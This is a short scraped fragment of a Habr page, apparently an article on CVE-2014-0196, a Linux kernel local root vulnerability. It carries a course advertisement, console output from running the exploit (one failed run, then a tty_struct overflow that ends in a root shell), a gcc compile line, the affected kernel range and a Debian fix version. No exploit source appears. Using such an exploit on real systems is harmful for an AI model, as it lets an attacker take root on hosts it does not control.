Хабр Курсы для всех
РЕКЛАМА
Практикум, Хекслет, SkyPro, авторские курсы — собрали всех и попросили скидки. Осталось выбрать!
$ ./exploit
[+] Resolving symbols
[+] Resolved commit_creds: (nil)
[+] Resolved prepare_kernel_cred: (nil)
$ id
uid=1000
dfyz@victoria ~ $ ./a.out [+] Resolving symbols [+] Resolved commit_creds: (address) [+] Resolved prepare_kernel_cred: (address) [+] Doing once-off allocations [+] Attempting to overflow into a tty_struct.... [+] Got it :) root@victoria ~ #
$ gcc cve-2014-0196-md.c -lutil -lpthread
Эксплоит работает только на ядрах >= v3.14-rc1
For the stable distribution (wheezy), these problems have been fixed in version 3.2.57-3+deb7u1.
Уязвимость в ядре Linux, позволяющая получить локальный root